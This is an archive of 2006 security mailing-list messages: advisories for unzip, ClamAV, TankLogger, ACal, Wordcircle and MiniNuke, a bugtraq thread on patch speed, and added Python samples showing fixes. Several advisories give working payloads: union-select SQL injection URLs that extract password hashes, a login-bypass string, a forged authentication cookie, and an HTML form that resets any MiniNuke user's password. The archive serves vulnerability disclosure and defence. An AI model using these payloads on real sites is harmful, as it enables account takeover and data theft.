Alpha architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_alpha.deb
Size/MD5 checksum: 175506 90375091fd0c2577518bfd7db2202272
AMD64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_amd64.deb
Size/MD5 checksum: 154876 7129ee6610e6ec0320141bb7aaa5288e
ARM architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_arm.deb
Size/MD5 checksum: 155430 3fb2c5576d1709c6d7cc1b89d61a50b8
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_i386.deb
Size/MD5 checksum: 144934 0e860597ffe259038f7bb8e1ce2630df
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_ia64.deb
Size/MD5 checksum: 206648 d261bf8a2e3c8fce3d0898355a7420db
HP Precision architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_hppa.deb
Size/MD5 checksum: 162840 91d7d512b915757bf7c7e3e8640efa0c
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_m68k.deb
Size/MD5 checksum: 133734 878d1597bd5ef623a6bc70f6446654a4
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_mips.deb
Size/MD5 checksum: 163396 5cbe0e22136949f240031502ea07d456
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_mipsel.deb
Size/MD5 checksum: 163966 4066fa1e97bad61c47be9b6ffa47179f
PowerPC architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_powerpc.deb
Size/MD5 checksum: 157388 25c3d9d685ec411e5b53cc0e8002ca8e
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_s390.deb
Size/MD5 checksum: 156494 bfeb0b1d801266334e6a46f0818a9e6f
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/u/unzip/unzip_5.52-1sarge3_sparc.deb
Size/MD5 checksum: 154952 e1e42335312202d8b3f0727e9d78fda9
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDxjcDW5ql+IAeqTIRArJQAJ48ZSIEK2BLNM8nw7eF+nYWcAp1SACglvjT
4zYhaiqXeH/DSpRL/YVOouM=ZkQw
-----END PGP SIGNATURE-----
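The race described in DSA 903-2 is the gap between writing an extracted file and setting its permissions by name. The sketch below is an added illustration, not unzip's code and not part of the advisory: the function names, the file names and the `swap` hook (which stands in for another local user of the directory) are assumptions made for the demonstration.

```python
import os
import stat
import tempfile


def extract_by_path(path, data, mode, swap=None):
    """Racy pattern: write, close, then chmod() by *name*."""
    with open(path, "wb") as fh:
        fh.write(data)
    if swap:                  # another user of the directory acts here,
        swap(path)            # between close() and chmod()
    os.chmod(path, mode)      # applies to whatever the name points at *now*


def extract_by_fd(path, data, mode, swap=None):
    """Hardened pattern: create exclusively, set the mode on the descriptor."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    try:
        os.write(fd, data)
        if swap:
            swap(path)
        os.fchmod(fd, mode)   # bound to the inode we created, not to the name
    finally:
        os.close(fd)


def demo(extract):
    """Return the mode of an unrelated private file after extraction."""
    with tempfile.TemporaryDirectory() as work:
        victim = os.path.join(work, "private.key")   # constructed sample file
        with open(victim, "wb") as fh:
            fh.write(b"secret")
        os.chmod(victim, 0o600)

        shared = os.path.join(work, "shared")        # directory others can write to
        os.mkdir(shared)
        target = os.path.join(shared, "readme.txt")

        def swap(path):
            # Replace the freshly written file with a link to the private file.
            os.unlink(path)
            os.symlink(victim, path)

        extract(target, b"hello", 0o666, swap)
        return stat.S_IMODE(os.stat(victim).st_mode)


if __name__ == "__main__":
    print("chmod by path :", oct(demo(extract_by_path)))
    print("fchmod by fd  :", oct(demo(extract_by_fd)))
```

With the path-based variant the private file ends up with the archive member's mode; with the descriptor-based variant it keeps its original mode because the permission change never re-resolves the name.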
From - Thu Jan 12 18:43:07 2006
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: ZDI-06-001: Clam AntiVirus UPX Unpacking Code Execution Vulnerability
From: zdi-disclosures@3com.com
Message-ID: <OF6ECE2BEA.98D2231A-ON882570F4.006F295C-882570F4.00719A1F@3com.com>
Date: Thu, 12 Jan 2006 12:37:09 -0800
ZDI-06-001: Clam AntiVirus UPX Unpacking Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-001.html
January 12, 2006
-- CVE ID:
CVE-2006-0162
-- Affected Vendor:
Clam AntiVirus
-- Affected Products:
Clam AntiVirus 0.80 through 0.87.1
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 13, 2005 by Digital Vaccine protection
filter ID 3975. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable ClamAV installations. Authentication is not required to
exploit this vulnerability.
This specific flaw exists within libclamav/fsg.c during the unpacking of
executable files compressed with FSG v1.33. Due to invalid bounds
checking when copying user-supplied data to heap allocated memory, an
exploitable memory corruption condition is created. The unpacking
algorithm for other versions of FSG is not affected.
-- Vendor Response:
Addressed in Clam AntiVirus version 0.88:
sf.net/project/shownotes.php?release_id=384086&group_id=86638
-- Disclosure Timeline:
2005.13.12 - Vulnerability reported to vendor
2005.13.12 - Digital Vaccine released to TippingPoint customers
2006.12.01 - Public release of advisory
-- Credit:
This vulnerability was discovered by an anonymous researcher.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.
From - Thu Jan 12 18:53:07 2006
Date: 12 Jan 2006 21:57:16 -0000
Message-ID: <20060112215716.7129.qmail@securityfocus.com>
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] TankLogger SQL Injection Vulnerability
New eVuln Advisory:
TankLogger SQL Injection Vulnerability
--------------------Summary----------------
Software: TankLogger
Software's Web Site:
http://tanklogger.sourceforge.net/
Versions: 2.4
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0026
-----------------Description---------------
Vulnerable script:
general_functions.php
The variables $livestock_id and tank_id aren't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: gpc_magic_quotes: off
--------------Exploit----------------------
SQL Injection Example:
http://host/exp/tanklogger/showInfo.php?livestock_id�'%20union%20select%201,2,3,4,5,6,7,8,9/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/26/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:03:07 2006
Date: 12 Jan 2006 21:56:16 -0000
Message-ID: <20060112215616.7042.qmail@securityfocus.com>
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] ACal Authentication Bypass & PHP Code Insertion
New eVuln Advisory:
ACal Authentication Bypass & PHP Code Insertion
--------------------Summary----------------
Software: ACal
Software's Web Site:
http://acalproj.sourceforge.net/
Versions: 2.2.5
Critical Level: Dangerous
Type: PHP Code Execution
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0025
-----------------Description---------------
Vulnerable script: login.php
To authorize any user, the forum script checks only one cookie variable: ACalAuthenticate
The forum doesn't make a password comparison.
Registered users can modify header.php and footer.php files. System access is possible.
--------------Exploit----------------------
Cookie: ACalAuthenticate=inside
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/25/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
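The ACal report above comes down to a cookie whose mere value is treated as proof of login. The following added example, which is not ACal's code and not part of the advisory, puts that check beside a server-signed session cookie; the key, the token layout and every function name are assumptions made for the illustration.

```python
import hashlib
import hmac
import time

# Assumption: a random per-installation secret that never leaves the server.
SECRET = b"constructed-demo-key"


def is_logged_in_weak(cookies):
    """Pattern from the advisory: a fixed cookie value is the only check."""
    return cookies.get("ACalAuthenticate") == "inside"


def _tag(payload, key):
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(user, now=None, ttl=3600, key=SECRET):
    """Build the cookie value. Call this only after the password was verified."""
    if "|" in user:
        raise ValueError("user name must not contain the field separator")
    now = time.time() if now is None else now
    payload = f"{user}|{int(now) + ttl}"
    return f"{payload}|{_tag(payload, key)}"


def verify_session(cookies, now=None, key=SECRET):
    """Return the user name for an authentic, unexpired cookie, else None."""
    parts = cookies.get("ACalAuthenticate", "").split("|")
    if len(parts) != 3:
        return None
    user, expires, tag = parts
    expected = _tag(f"{user}|{expires}", key)
    # Constant-time comparison; bytes so that odd client input cannot raise.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    now = time.time() if now is None else now
    if not expires.isdigit() or int(expires) < now:
        return None
    return user


if __name__ == "__main__":
    forged = {"ACalAuthenticate": "inside"}
    print("weak check accepts fixed value :", is_logged_in_weak(forged))
    print("signed check on the same cookie:", verify_session(forged))
    good = {"ACalAuthenticate": issue_session("admin")}
    print("signed check on issued cookie  :", verify_session(good))
```

A signed cookie only proves that the server issued it, so the password comparison at login is still required before `issue_session` is called.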
From - Thu Jan 12 19:13:07 2006
Date: 12 Jan 2006 21:58:15 -0000
Message-ID: <20060112215815.7215.qmail@securityfocus.com>
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] Wordcircle Authentication Bypass
New eVuln Advisory:
Wordcircle Authentication Bypass
--------------------Summary----------------
Software: Wordcircle
Software's Web Site:
http://www.wordcircle.org/
Versions: 2.17
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0027
-----------------Description---------------
Vulnerable scripts:
v_login.php
User-defined password isn't properly sanitized before being used in a SQL query. This can be used to log in as administrator without a password.
Condition: gpc_magic_quotes: off
--------------Exploit----------------------
Login Page:
http://host/index.php?a=login
Enter your email address: any
Enter your password: a' or 1/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/27/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
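Both the TankLogger report (livestock_id in a lookup) and the Wordcircle login report above describe request values concatenated into SQL text. The following added example, which is not code from either application or from the advisories, runs the two reported inputs against string-built and parameter-bound queries; the SQLite schema, the table contents and the function names are assumptions, and password hashing is left out to keep the focus on query construction.

```python
import sqlite3

# Inputs as given in the two advisories, URL-decoded.
LOGIN_INPUT = "a' or 1/*"
UNION_INPUT = "' union select 1,2,3,4,5,6,7,8,9/*"


def make_db():
    """Constructed in-memory stand-in for the applications' tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin@example.org', 'not-guessable')")
    db.execute("CREATE TABLE livestock "
               "(id INTEGER, name TEXT, c3, c4, c5, c6, c7, c8, c9)")
    db.execute("INSERT INTO livestock (id, name) VALUES (7, 'clownfish')")
    return db


def login_concat(db, email, password):
    """Vulnerable: the quote in the input ends the string literal."""
    sql = ("SELECT email FROM users WHERE email='" + email +
           "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(db, email, password):
    """Hardened: values travel separately from the SQL text."""
    row = db.execute("SELECT email FROM users WHERE email=? AND password=?",
                     (email, password)).fetchone()
    return row[0] if row else None


def livestock_concat(db, livestock_id):
    """Vulnerable lookup by id."""
    sql = "SELECT * FROM livestock WHERE id='" + livestock_id + "'"
    return db.execute(sql).fetchall()


def livestock_bound(db, livestock_id):
    """Hardened lookup: ids are integers, so reject anything else, then bind."""
    if not livestock_id.isdigit():
        return []
    return db.execute("SELECT * FROM livestock WHERE id=?",
                      (int(livestock_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concat login :", login_concat(db, "any", LOGIN_INPUT))
    print("bound login  :", login_bound(db, "any", LOGIN_INPUT))
    print("concat lookup:", livestock_concat(db, UNION_INPUT))
    print("bound lookup :", livestock_bound(db, UNION_INPUT))
```

Both advisories list `gpc_magic_quotes: off` as a precondition; bound parameters remove the dependence on that server setting.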
From - Thu Jan 12 19:23:07 2006
Date: 12 Jan 2006 22:01:14 -0000
Message-ID: <20060112220114.7515.qmail@securityfocus.com>
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] Wordcircle Multiple SQL Injection & XSS Vulnerabilities
New eVuln Advisory:
Wordcircle Multiple SQL Injection & XSS Vulnerabilities
--------------------Summary----------------
Software: Wordcircle
Software's Web Site:
http://www.wordcircle.org/
Versions: 2.17
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0028
-----------------Description---------------
Most user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code or to insert any JavaScript code.
--------------Exploit----------------------
Cross-Site Scripting Example.
Page:
http://host/index.php?frm=mine
(need to be logged in)
Course name: <XSS>
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/28/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:43:07 2006
Message-ID: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:32:17 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection
vulnerability
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_d7vk00he79s"
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) H3 (4.0.3)
Status:
This message is in MIME format.
--=_d7vk00he79s
Content-Type: text/plain;
charset=ISO-8859-9
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:47 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web:
http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About: Via this method a remote attacker can inject an SQL query into news.asp
---
How&Example: GET ->
http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hidf%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_idR
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Thanks to ajan;)
Regards,
From the NWPX team,
nuker a.k.a nukedx
--=_d7vk00he79s
--=_d7vk00he79s--
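Added example, not part of the advisory above and not MiniNuke's code: the flaw class reported for the hid parameter of news.asp, shown beside a corrected lookup. It is written in Python with sqlite3 rather than ASP; the news table, its columns and all row values are constructed, and only the names hid, members, uye_id, isim and sifre are taken from the advisory.

```python
import sqlite3


def make_db():
    """Constructed stand-in data; only the names hid, members, uye_id,
    isim and sifre come from the advisory."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (hid INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE members (uye_id INTEGER PRIMARY KEY, isim TEXT, sifre TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        INSERT INTO members VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return db


def print_news_vulnerable(db, hid):
    # The reported flaw class: the request value becomes part of the SQL text.
    sql = "SELECT hid, title, body FROM news WHERE hid = " + hid
    return db.execute(sql).fetchall()


def print_news_fixed(db, hid):
    # hid is a numeric key, so accept only a short run of ASCII digits ...
    if not (hid.isascii() and hid.isdigit() and len(hid) <= 9):
        raise ValueError("hid must be a positive integer")
    # ... and pass it as a bound parameter, never as part of the statement.
    sql = "SELECT hid, title, body FROM news WHERE hid = ?"
    return db.execute(sql, (int(hid),)).fetchall()


# Constructed input with the same shape as the request in the advisory.
UNION_INPUT = "0 UNION SELECT 0, isim, sifre FROM members"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", print_news_vulnerable(db, UNION_INPUT))
    try:
        print_news_fixed(db, UNION_INPUT)
    except ValueError as exc:
        print("fixed: rejected,", exc)
```

With the concatenated query the members row comes back through the news page; the corrected lookup rejects the same input before any SQL is run.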
From - Thu Jan 12 19:43:07 2006
X-UIDL: 43c6f79a00000002
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22852-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D2AB232CDB
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:35:05 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 16:35:04 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E1EE923B222; Thu, 12 Jan 2006 15:59:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23389 invoked from network); 12 Jan 2006 13:08:28 -0000
Message-ID: <20060112223643.e5oeda8tdk0k80gc@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:36:43 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote
user password change exploit
References: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
In-Reply-To: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-9;
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) H3 (4.0.3)
Status:
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:49 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web:
http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About: Via this method a remote attacker can change any user's password without
logging in.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="
http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
</font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
</font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
</font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
#FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Regards,
From the NWPX team,
nuker a.k.a nukedx
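Added example, not part of the advisory above and not MiniNuke's code: the form in the advisory posts only a member name and the new password to the final lost-password step, so this sketch shows that step accepting a change only with a single-use, expiring token that the server issued for that member. It is written in Python; ResetStore, its method names, the 15-minute lifetime and the PBKDF2 parameters are all assumptions made for illustration.

```python
import hashlib
import hmac
import os
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset token stays valid (assumed policy)


class ResetStore:
    def __init__(self):
        self._pending = {}   # member -> (sha256 of token, expiry time)
        self.passwords = {}  # member -> (salt, PBKDF2 hash)

    def issue(self, member, now=None):
        """Call only after the member has passed the recovery challenge."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).digest()
        self._pending[member] = (digest, now + TOKEN_TTL)
        return token  # delivered out of band, e.g. to the registered e-mail

    def set_new_password(self, member, token, pass1, pass2, now=None):
        """Final step: refuses unless the token was issued for this member."""
        now = time.time() if now is None else now
        entry = self._pending.get(member)
        if entry is None:
            return False                  # no reset in progress for this name
        digest, expires = entry
        supplied = hashlib.sha256((token or "").encode()).digest()
        if not hmac.compare_digest(digest, supplied):
            return False                  # missing or wrong token
        if now > expires:
            del self._pending[member]     # expired tokens are discarded
            return False
        if not pass1 or pass1 != pass2:
            return False                  # token stays valid for a retry
        del self._pending[member]         # single use
        salt = os.urandom(16)
        hashed = hashlib.pbkdf2_hmac("sha256", pass1.encode(), salt, 200_000)
        self.passwords[member] = (salt, hashed)
        return True


if __name__ == "__main__":
    store = ResetStore()
    tok = store.issue("alice")
    print("no token:  ", store.set_new_password("alice", "", "n3w", "n3w"))
    print("with token:", store.set_new_password("alice", tok, "n3w", "n3w"))
    print("replayed:  ", store.set_new_password("alice", tok, "n3w", "n3w"))
```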
From - Fri Jan 13 01:27:31 2006
X-UIDL: 43c7485200000001
X-Mozilla-Status: 0011
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-22822-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 9A4C032CEF
for <lists@securityspace.com>; Fri, 13 Jan 2006 01:17:50 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 21:54:47 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 101E6144C1C; Wed, 11 Jan 2006 13:59:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8078 invoked from network); 9 Jan 2006 21:37:47 -0000
From: "D. Hazelton" <dhazelton@enter.net>
To: bugtraq@securityfocus.com, Gadi Evron <ge@linuxbox.org>
Subject: Re: industry standards - current status [was: what we REALLY learned from WMF]
Date: Mon, 9 Jan 2006 23:21:15 -0500
User-Agent: KMail/1.8.1
References: <43BD9569.4090701@linuxbox.org> <00c501c61282$b0572f30$0a01a8c0@anchorsign.com> <43BEF5B6.9020306@linuxbox.org>
In-Reply-To: <43BEF5B6.9020306@linuxbox.org>
MIME-Version: 1.0
Content-Type: multipart/signed;
boundary="nextPart14224173.DgErngoNKe";
protocol="application/pgp-signature";
micalg=pgp-sha1
Content-Transfer-Encoding: 7bit
Message-Id: <200601092321.21471.dhazelton@enter.net>
X-Virus-Checker-Version: Enter.Net Virus Scanner 1.1
Status:
--nextPart14224173.DgErngoNKe
Content-Type: multipart/mixed;
boundary="Boundary-01=_8YzwD+DKCA9Ogq5"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
--Boundary-01=_8YzwD+DKCA9Ogq5
Content-Type: text/plain;
charset="windows-1252"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I track this list to keep abreast of new bugs so I can try to take pro-active
steps with the systems I run. In this case I've been ignoring this thread
until now... About what I've seen of the five points in discussion here -
certainly. It does seem to be flame-bait.
Now onto the content...
On Friday 06 January 2006 17:56, Gadi Evron wrote:
<snip>
> Microsoft did nothing wrong, in fact, they did great. Microsoft is an
> easy choice in this case because even though each case varies, they
> showed a capability here to deal with issues much faster than usual.
Agreed. MS is a company that has the resources and should be able to deal with
critical patches in this manner a great deal of the time. The same goes for
all other major software companies, as well - in concurrence with your note
below.
> Now, the point I am trying to make is not MS-specific, but rather about
> our standards in the industry.
>
> As an example, take false positives. A HUGE problem I[DP]S experts try
> and deal with every day, invest a lot of time in, and yet can't solve...
> therefore we got used in the industry to a level of false positives.
>
> Same goes to vulnerability scanners.. false positives appear as a way of
> nature.
False positives should be handled in a quiet manner by vendors, IMHO. If they
do otherwise it causes a drop in quality of information available. Not that
this is a feasible solution re: most software companies. In a number of
cases, as demonstrated by events at MS during the development cycle of
Windows 95, there is a large amount of legacy code that isn't clearly
documented or isn't documented at all. For applications that are recent and
not prey to the ravages of poorly understood legacy code it can work.
> And yet, some vendors are different than others. In I[DP]S as well as
> vulnerability scanning. With some vendors, they invest less in features
> and more in eliminating false positives. They treat them as full-blown
> bugs rather than "something to live with". It works -- at least better
> than with others.
Ah, I see. Makes my previous statement a bit pointless, other than the truth
about my belief that software companies should actively work to eliminate
those false positives to increase the quality of information available to the
community.
<snip>
> In this case though, it is once again about standards. Microsoft shows
> Oracle is not alone, although they achieved amazing progress, especially
> in the last couple of years.
>
> If a patch can be put through full testing and released within days when
> it is taken seriously enough and resources are invested - no matter for
> what reason, I see no reason myself that this can't become common practice.
Agreed. Critical security patches should have a shortened development and
testing cycle so they can reach the end-users as fast as possible. Although,
in light of my (somewhat limited) knowledge of corporate practices and
policies this might take work to get any number of the larger companies to
understand.
> We should be practical in our demands, but if in practice this can be
> done in days, surely vendors can step it up a notch on critical issues.
> Microsoft runs on most of the computers on this planet, therefore they
> are to be treated different for better and for worse. A year+ of waiting
> for a patch while people might be exploited is unacceptable according to
> standards we should be upholding now that we know what is possible.
I do agree. See above section.
<snip>
In conclusion all I can say is that you addressed the seeming inconsistencies
noted in a clear manner and I happen to agree with it all. If the software
industry can change its paradigms for inherent security - trying to make the
products harder to exploit from the design phase on - and change its
handling of extremely critical security patches (Like MS did about the recent
WMF vuln) then the work of I[DP]S (to borrow your shorthand) professionals
will be made that much easier.
However I am not going to even dream that the industry will change in this
manner. That is something that I don't see happening unless the community and
various governmental agencies (in the US and other nations) begin to place
_serious_ and _continued_ pressure on the industry to change in that manner.
Since a large number of people across the globe would have to agree for that
to happen I cannot consider it a real possibility.
Although, I must say, if MS does for future critical security patches what it
did for the WMF patch, the rest of the industry may follow Microsoft. Though
I like to bash MS as much as the next Linux user, they do have a huge segment
of the market for Operating Systems and business software. A large enough
segment that a change they make does have a chance of spreading through the
rest of the industry.
D. Hazelton
--Boundary-01=_8YzwD+DKCA9Ogq5--
--nextPart14224173.DgErngoNKe
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBDwzZBj4KAu4sAwyoRAsTKAJsEsH/H1wZXWcgNqJPM+1OtS+MA6ACcCHcF
UmxXwz0StqBjXXXHToJxwxE=MuMF
-----END PGP SIGNATURE-----
--nextPart14224173.DgErngoNKe--
From - Fri Jan 13 02:27:31 2006
X-UIDL: 43c7566200000003
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22824-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C54B332C9D
